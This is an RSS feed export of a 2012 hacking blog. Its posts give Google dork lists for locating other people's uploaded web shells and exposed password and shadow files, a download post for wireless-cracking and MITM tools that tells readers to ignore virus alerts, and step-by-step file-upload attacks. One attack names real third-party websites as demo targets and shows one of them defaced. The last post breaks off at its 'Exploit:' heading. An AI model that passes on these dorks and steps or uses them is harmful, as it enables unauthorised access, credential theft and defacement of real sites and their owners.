<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-5995707516009947483</atom:id><lastBuildDate>Wed, 06 Nov 2024 02:43:40 +0000</lastBuildDate><category>Vulnerability</category><category>Website Hacking</category><category>Exploit</category><category>Wordpress Hacking</category><category>Tips &#39;n&#39; Tricks</category><category>Tools</category><category>Dark Crystal</category><category>Security</category><category>Cellphone Hacking</category><category>Dork</category><category>G.P.S.</category><category>Google</category><category>Miscellaneous</category><category>The Cyber News</category><category>Wireless Hacking</category><title>Convex Coders</title><description>An endeavor of Girish Sharma aka -[D4RK_CRYST4L]-</description><link>http://convex-coders.blogspot.com/</link><managingEditor>noreply@blogger.com (Convex Coders)</managingEditor><generator>Blogger</generator><openSearch:totalResults>16</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-1595821810036183314</guid><pubDate>Fri, 10 Feb 2012 10:39:00 +0000</pubDate><atom:updated>2012-02-10T16:09:52.454+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Dark Crystal</category><category domain="http://www.blogger.com/atom/ns#">Miscellaneous</category><category domain="http://www.blogger.com/atom/ns#">Tips &#39;n&#39; Tricks</category><title>Hacker Attitudes and their Differences</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRu7ac2ffC7_ojBdrpoA0iG1uqe14AAFmso-Oa61wvYBV4lZn61PJc0c8vODpOiJEQJQgk-XzL7Jt30IZDNRrMQv9TF1sqdQFJ1yQF2MhxqtvsaBo6mpRLjKp62T-UlgyTTMrktRn8mnE/s1600/hacker.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRu7ac2ffC7_ojBdrpoA0iG1uqe14AAFmso-Oa61wvYBV4lZn61PJc0c8vODpOiJEQJQgk-XzL7Jt30IZDNRrMQv9TF1sqdQFJ1yQF2MhxqtvsaBo6mpRLjKp62T-UlgyTTMrktRn8mnE/s1600/hacker.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;What kinda &lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i style=&quot;color: red;&quot;&gt;attitude&lt;/i&gt;&lt;/span&gt; &lt;/span&gt;a &lt;i&gt;&lt;span style=&quot;color: red; font-size: large;&quot;&gt;HACKER&lt;/span&gt; &lt;/i&gt;have...this is what I realized till now :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;~ The Whitehat Hacker ~&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
Refers to ethical hackers as well, as they (usually) only break into  systems and pentest IF they have permission, thus they don&#39;t have a  reason to do anything malicious except if it has been requested by f.ex.  a contracting corporation (which is quite unlikely). These are also  refered to as the good guys, as most of them makes proof of concept,  consulting, etc. Which helps the internet to become more secure (even  though their proof of concept are usually abused by f.ex. script  kiddies). It should be said though, that ocasionally blackhats has been  seen claiming they&#39;re whitehats, and also (of course) that script  kiddies were whitehats.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;~ The Gray/Greyhat Hacker ~&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
These guys, are also known as hybrid hackers as they are in between  black- and white-hats. Usually, they don&#39;t hack for personal gain or  have malicious intentions, yet they do break into systems without  permissions ocasionally (or all the time) as well. The difference is  they usually don&#39;t&lt;br /&gt;
have a purpose or interest in destroying other individuals data etc. It  is though, important to keep in mind that they will not necessarily  notify the system admin of a penetrated system, yet ocasionally they  might notify the system admin if they feel like it. Some grayhats also  prefer anonymity more than fast (and highly detectable) attacks as well.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;~ The Blackhat Hacker ~&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
This is the type of hacker that hacks for usually personal gain, wether  it is economical, political or just fun doesn&#39;t matter. There&#39;s no such  thing as respect for authorities, loyality or morale (if there were,  then they would be more near the grayhat area). In this case there&#39;s  often found script kiddies claiming that they are pure blackhat, because  it sounds cool, destroying and might work with non-hackers to induce a  state of &quot;awesome&#39;ness&quot;, even though the real hackers would have no  problem seeing that the person is just a script kiddy. &lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;
~ The Ghost Hacker ~ &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
This type of hacker, doesn&#39;t exist as the person behind has hidden that  identity so well he should never get caught. The reason why it&#39;s  unlikely he would get caught is due to he&#39;s extremely well skilled and  also very focused on what he is doing. The ghost hacker lives though, a  double-life in the real world and also virtually. He has a job, usually  an anonymous IT-job in the middleclass, which he does without any  problems. He has a normal route and routine on the internet just as the  others of us, but this whole identity is just an identity to hide his  real intentions. In his other life, which NO ONE knows about, he has  probably a room with seperate machines, which are quite stealthy. The  last note about ghost hackers is they (usually) make big money on their  things, and they might use a lot of time on doing the work with their  contractors which are of course, hidden as well.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;~ The Script Kiddie ~&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
A script kiddie is not a hacker. He doesn&#39;t have the required knowledge  about computers, servers and networks, infact only very basical  knowledge about protocols, if he even knows what a protocol is. He&#39;s  usually not capable of programming anything, though he&#39;s usually found  on forums where similar exchanges ignorance. These kind of guys usually  claims they know a lot, even though they really don&#39;t thus they are also  found striking very at very random targets, on todays internet usually  google picks their targets for them by using googledorks which might  have even been made by other more skilled hackers. Most script kiddies  doesn&#39;t understand anything in depth, yet they think they know a lot  cause they can do their advanced stuff on windows machines.&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/02/hacker-attitudes-and-their-differences.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRu7ac2ffC7_ojBdrpoA0iG1uqe14AAFmso-Oa61wvYBV4lZn61PJc0c8vODpOiJEQJQgk-XzL7Jt30IZDNRrMQv9TF1sqdQFJ1yQF2MhxqtvsaBo6mpRLjKp62T-UlgyTTMrktRn8mnE/s72-c/hacker.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-5600808559002556181</guid><pubDate>Sat, 28 Jan 2012 12:45:00 +0000</pubDate><atom:updated>2012-01-28T18:15:27.889+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Dork</category><category domain="http://www.blogger.com/atom/ns#">Google</category><title>Find Uploaded shells and Passwords By Google dorks (priv8 dorks)</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEsmp9anfct-PwNdWlhw-s9N_wbST7RzRp2C79WqiTN24Evps564Zu8Yf8KdD20dkNVDtwr0McWowJcLLRLu1yfnxd1M9kI1RrHjB8-LU2LxpeqyN1X0foPrEOZexlAM1W3iITBk4tP64/s1600/Google.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;432&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEsmp9anfct-PwNdWlhw-s9N_wbST7RzRp2C79WqiTN24Evps564Zu8Yf8KdD20dkNVDtwr0McWowJcLLRLu1yfnxd1M9kI1RrHjB8-LU2LxpeqyN1X0foPrEOZexlAM1W3iITBk4tP64/s640/Google.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;i&gt;&lt;b&gt;Go to Google.com&lt;/b&gt;&lt;/i&gt; and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !!&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red; font-size: large;&quot;&gt;&lt;b&gt;Dorks for finding shells:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;inurl:.php &quot;cURL: ON MySQL: ON MSSQL: OFF&quot; &lt;br /&gt;
&lt;br /&gt;
&quot;Shell&quot; filetype:php intext:&quot;uname -a:&quot; &quot;EDT 2010&quot;&lt;br /&gt;
&lt;br /&gt;
intitle:&quot;intitle:r57shell&quot; [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]&lt;br /&gt;
&lt;br /&gt;
inurl:&quot;c99.php&quot; &amp;amp; intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;br /&gt;
&lt;br /&gt;
inurl:&quot;c100.php&quot; &amp;amp; intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout&lt;/span&gt;&lt;br style=&quot;color: black;&quot; /&gt;&lt;span style=&quot;color: black;&quot;&gt; &lt;/span&gt;&lt;br style=&quot;color: black;&quot; /&gt;&lt;span style=&quot;color: black;&quot;&gt; intitle:&quot;Shell&quot; inurl:&quot;.php&quot; &amp;amp; intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update &lt;/span&gt;&lt;br style=&quot;color: black;&quot; /&gt;&lt;span style=&quot;color: black;&quot;&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red; font-size: large;&quot;&gt;&lt;b&gt;Dorks for finding Passwords:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
filetype:htpasswd htpasswd&lt;br /&gt;
intitle:&quot;index of&quot; &quot;.htpasswd&quot; -intitle:&quot;dist&quot; -apache -htpasswd.c&lt;br /&gt;
index.of.private (algo privado)&lt;br /&gt;
intitle:index.of master.passwd&lt;br /&gt;
inurlasslist.txt (para encontrar listas de passwords)&lt;br /&gt;
intitle:&quot;index of..etc&quot; passwd&lt;br /&gt;
intitle:admin intitle:login&lt;br /&gt;
&quot;incorrect syntax near&quot; (sql script error)&lt;br /&gt;
intitle:&quot;the page cannot be found&quot; inetmgr (debilidad en iis4)&lt;br /&gt;
intitle:index.of ws_ftp.ini&lt;br /&gt;
&quot;supplied arguments is not a valid postgresql result&quot; (possible debilidad sql)&lt;br /&gt;
_vti_pvt password intitle:index.of (frontpage)&lt;br /&gt;
inurl:backup intitle:index.of inurl:admin&lt;br /&gt;
&quot;index of /backup&quot;&lt;br /&gt;
index.of.password&lt;br /&gt;
index.of.winnt&lt;br /&gt;
&lt;br /&gt;
inurl:&quot;auth_user_file.txt&quot;&lt;br /&gt;
&quot;index of /admin&quot;&lt;br /&gt;
&quot;index of /password&quot;&lt;br /&gt;
&quot;index of /mail&quot;&lt;br /&gt;
&quot;index of /&quot; +passwd&lt;br /&gt;
index of /&quot; +.htaccess&lt;br /&gt;
index of ftp +.mdb allinurl:/cgi-bin/ +mailto&lt;br /&gt;
allintitle: &quot;index of/admin&quot;&lt;br /&gt;
allintitle: &quot;index of/root&quot;&lt;br /&gt;
allintitle: sensitive filetype:doc&lt;br /&gt;
allintitle: restricted filetype :mail&lt;br /&gt;
allintitle: restricted filetype:doc site:gov&lt;br /&gt;
administrator.pwd.index&lt;br /&gt;
authors.pwd.index&lt;br /&gt;
service.pwd.index&lt;br /&gt;
filetype:config web&lt;br /&gt;
gobal.asax index&lt;br /&gt;
inurlasswd filetype:txt&lt;br /&gt;
inurl:admin filetypeBig Grinb&lt;br /&gt;
inurl:iisadmin&lt;br /&gt;
inurl:&quot;auth_user_file.txt&quot;&lt;br /&gt;
inurl:&quot;wwwroot/*.&quot;&lt;br /&gt;
allinurl: winnt/system32/ (get cmd.exe)&lt;br /&gt;
allinurl:/bash_history&lt;br /&gt;
intitle:&quot;index of&quot; .sh_history&lt;br /&gt;
intitle:&quot;index of&quot; .bash_history&lt;br /&gt;
intitle:&quot;index of&quot; passwd&lt;br /&gt;
intitle:&quot;index of&quot; people.1st&lt;br /&gt;
intitle:&quot;index of&quot; pwd.db&lt;br /&gt;
intitle:&quot;index of&quot; etc/shadow&lt;br /&gt;
intitle:&quot;index of&quot; spwd&lt;br /&gt;
intitle:&quot;index of&quot; master.passwd&lt;br /&gt;
intitle:&quot;index of&quot; htpasswd&lt;br /&gt;
intitle:&quot;index of&quot; members or accounts&lt;br /&gt;
intitle:&quot;index of&quot; user_carts or user _cart&lt;/span&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/find-uploaded-shells-and-passwords-by.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEsmp9anfct-PwNdWlhw-s9N_wbST7RzRp2C79WqiTN24Evps564Zu8Yf8KdD20dkNVDtwr0McWowJcLLRLu1yfnxd1M9kI1RrHjB8-LU2LxpeqyN1X0foPrEOZexlAM1W3iITBk4tP64/s72-c/Google.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-5435612874085362122</guid><pubDate>Thu, 26 Jan 2012 13:35:00 +0000</pubDate><atom:updated>2012-01-26T19:05:59.126+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Wireless Hacking</category><title>Wireless Hacking Tools 2011 : Free Download</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5T2SXE7DgdtgenUqsDhHL7C5jN8ifw9XAu5mLzuqbJ0hCL87mTk2EzOKdv-UL94TcIYgcd4ogGRL9OKpsNExmlxHkSWdY7YrvoyU53aZcfft0nI-s9tnxA_lCCdt211utKrF9YA1tL8A/s1600/searchforwirelessvn9.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;318&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5T2SXE7DgdtgenUqsDhHL7C5jN8ifw9XAu5mLzuqbJ0hCL87mTk2EzOKdv-UL94TcIYgcd4ogGRL9OKpsNExmlxHkSWdY7YrvoyU53aZcfft0nI-s9tnxA_lCCdt211utKrF9YA1tL8A/s320/searchforwirelessvn9.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;WiPhire&lt;/b&gt;  is a Bash script aimed at making the Wireless Hacking  process a lot  easier. This script was written on Backtrack 4 and  designed to be used  with Backtrack 4. This script was also designed to  be used with the Alfa  AWUS036H &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;Wireless adapter&lt;/span&gt; with the RTL8187 &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD11&quot;&gt;chipset&lt;/span&gt;. If you do not have  this chipset but another &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;adapter&lt;/span&gt; that is compatible with the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD9&quot;&gt;aircrack-ng&lt;/span&gt;   suite you will need to put it into monitor mode prior to running the   script if you wish to use an option that needs monitor mode enabled.   This script needs to be ran as root.&lt;br /&gt;
&lt;br /&gt;
1. Wireless hacking tool AIO 2009 edition with a few tweaks by tweaker so updated to 2011.&lt;br /&gt;
2. Airodump and Airongcrack etc. to get WEP and WPA password.&lt;br /&gt;
3. WiPhire airodump  is an 802.11 packet capture program that is designed to  &quot;capture as  much encrypted traffic as possible...each WEP data packet  has an  associated 3-byte Initialization Vector (IV): after a sufficient  number  of data packets have been collected, run aircrack on the  resulting  capture file. aircrack will then perform a set of statistical  attacks  developed by a talented hacker named KoreK.&quot;&lt;br /&gt;
&lt;br /&gt;
&lt;b style=&quot;color: red;&quot;&gt;These are the functions of the script :&lt;/b&gt;&lt;br /&gt;
autoMACtic MAC spoofer&lt;br /&gt;
Ability to crack WEP networks&lt;br /&gt;
Ability to crack WPA networks&lt;br /&gt;
Perform simple MITM attacks&lt;br /&gt;
DNSspoof a network&lt;br /&gt;
Use airdrop-ng to create a jammer&lt;br /&gt;
&lt;br /&gt;
&lt;b style=&quot;color: red;&quot;&gt;Programs that WiPhire Uses:&lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
airmon-ng&lt;br /&gt;
airodump-ng&lt;br /&gt;
aireplay-ng&lt;br /&gt;
aircrack-ng&lt;br /&gt;
airdrop-ng&lt;br /&gt;
xterm&lt;br /&gt;
crunch&lt;br /&gt;
pyrit&lt;br /&gt;
sslstrip&lt;br /&gt;
arpspoof&lt;br /&gt;
macchanger&lt;br /&gt;
kate&lt;br /&gt;
apache2&lt;br /&gt;
ettercap&lt;br /&gt;
Firefox&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;If a virus alert occurs disregard that as for these are &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;hacking tools&lt;/span&gt; and they will be flagged as virus&#39;s no matter what.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;Download&lt;/span&gt;:&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;a href=&quot;http://hotfile.com/dl/95289912/805d3d5/WHT2OII.rar.html&quot;&gt;http://hotfile.com/dl/95289912/805d3d5/WHT2OII.rar.html&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;Mirror 1&lt;/span&gt;:&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href=&quot;http://www.fileserve.com/file/mCesPNH/WHT2OII.rar&quot;&gt;http://www.fileserve.com/file/mCesPNH/WHT2OII.rar&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;Mirror 2:&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href=&quot;http://www.filesonic.com/file/54270824/WHT2OII.rar&quot;&gt;http://www.filesonic.com/file/54270824/WHT2OII.rar&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/wireless-hacking-tools-2011-free.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5T2SXE7DgdtgenUqsDhHL7C5jN8ifw9XAu5mLzuqbJ0hCL87mTk2EzOKdv-UL94TcIYgcd4ogGRL9OKpsNExmlxHkSWdY7YrvoyU53aZcfft0nI-s9tnxA_lCCdt211utKrF9YA1tL8A/s72-c/searchforwirelessvn9.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-7155323510324291530</guid><pubDate>Thu, 26 Jan 2012 13:24:00 +0000</pubDate><atom:updated>2012-01-26T18:56:22.724+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Dark Crystal</category><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><title>&quot;Add Testimonial&quot; : Remote File Upload Vulnerability.</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiudy4W_wi5FRtbOnY1rQ1R8-jKGkFpsnpUgbcWxJgnXU5qeNqPM8zgkvEkugNxxCaKTZR9hYzeiKUeO0OlEGhYLAnDcX9PIrhKjQZjnKMS58_Yh-Lz8Kz7npEgN4Nbtegx_FNw0WmT_o/s1600/Owned.%2521.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;243&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiudy4W_wi5FRtbOnY1rQ1R8-jKGkFpsnpUgbcWxJgnXU5qeNqPM8zgkvEkugNxxCaKTZR9hYzeiKUeO0OlEGhYLAnDcX9PIrhKjQZjnKMS58_Yh-Lz8Kz7npEgN4Nbtegx_FNw0WmT_o/s320/Owned.%2521.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;[#1]&lt;/b&gt; Open website .. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[#2] &lt;/b&gt;Go to this URL: t&lt;i&gt;estimonial/add.html.php&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;For example: &amp;nbsp;&lt;i&gt;http://Site.com/testimonial/add.html.php &lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
[#3]&lt;/b&gt; Now Upload Your Deface or any file&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;[#4]&lt;/b&gt; To view you &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;upload file&lt;/span&gt; go to /images/testimonial/ , you&#39;ll see &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;index of&lt;/span&gt; files here ... click on last file, its yours !!&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;[#5] &lt;/b&gt;Enjoy=) and do leave a Comment below if you Like it&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;br /&gt;
&lt;b&gt;Demo :&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;color: blue;&quot;&gt;http://sdhealingarts.com/testimonial/add.html.php?&lt;br /&gt;
http://slangmediagroup.com/testimonial/add.html.php?&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;span style=&quot;color: blue; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://thepharmcollective.com/testimonial/add.html.php? &lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;span style=&quot;color: blue; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.ganjadaddy.com/demo/firestation/testimonial/add.html.php? &lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;Result :&lt;/b&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;a href=&quot;http://thepharmcollective.com/images/testimonial/testim_20120126051440&quot; target=&quot;_blank&quot;&gt;&lt;b&gt; HACKED by -[D4RK_CRYST4L]-&lt;/b&gt;&lt;/a&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/add-testimonial-remote-file-upload.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiudy4W_wi5FRtbOnY1rQ1R8-jKGkFpsnpUgbcWxJgnXU5qeNqPM8zgkvEkugNxxCaKTZR9hYzeiKUeO0OlEGhYLAnDcX9PIrhKjQZjnKMS58_Yh-Lz8Kz7npEgN4Nbtegx_FNw0WmT_o/s72-c/Owned.%2521.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-6355119415163748926</guid><pubDate>Thu, 26 Jan 2012 12:47:00 +0000</pubDate><atom:updated>2012-01-26T18:30:22.039+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Dark Crystal</category><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><title>HTML Editor File Upload Vulnerability</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt2xFMAAfs7BG81nx5bDCDjoIbdQpEWYX6mYWFweU2fKsQreEBalE3lgn1_XhOToK-LU7pKdo1jP0mw_Exmfn658C6F4D4OZQTNKVl5SU-GkCD8HaSP6Xc4HVHCyb02A805YysEgUybNA/s1600/html_key.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;284&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt2xFMAAfs7BG81nx5bDCDjoIbdQpEWYX6mYWFweU2fKsQreEBalE3lgn1_XhOToK-LU7pKdo1jP0mw_Exmfn658C6F4D4OZQTNKVl5SU-GkCD8HaSP6Xc4HVHCyb02A805YysEgUybNA/s320/html_key.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Google Dork:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;inurl:/HTMLEditor/editor/&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;or&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;&quot;inurl:/HTMLEditor/editor//filemanager/&quot;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;or&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;b&gt;&quot;inurl:/HTMLEditor/editor//filemanager//&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;connectors&lt;/span&gt;/&quot;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b style=&quot;color: red;&quot;&gt;Exploit:&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
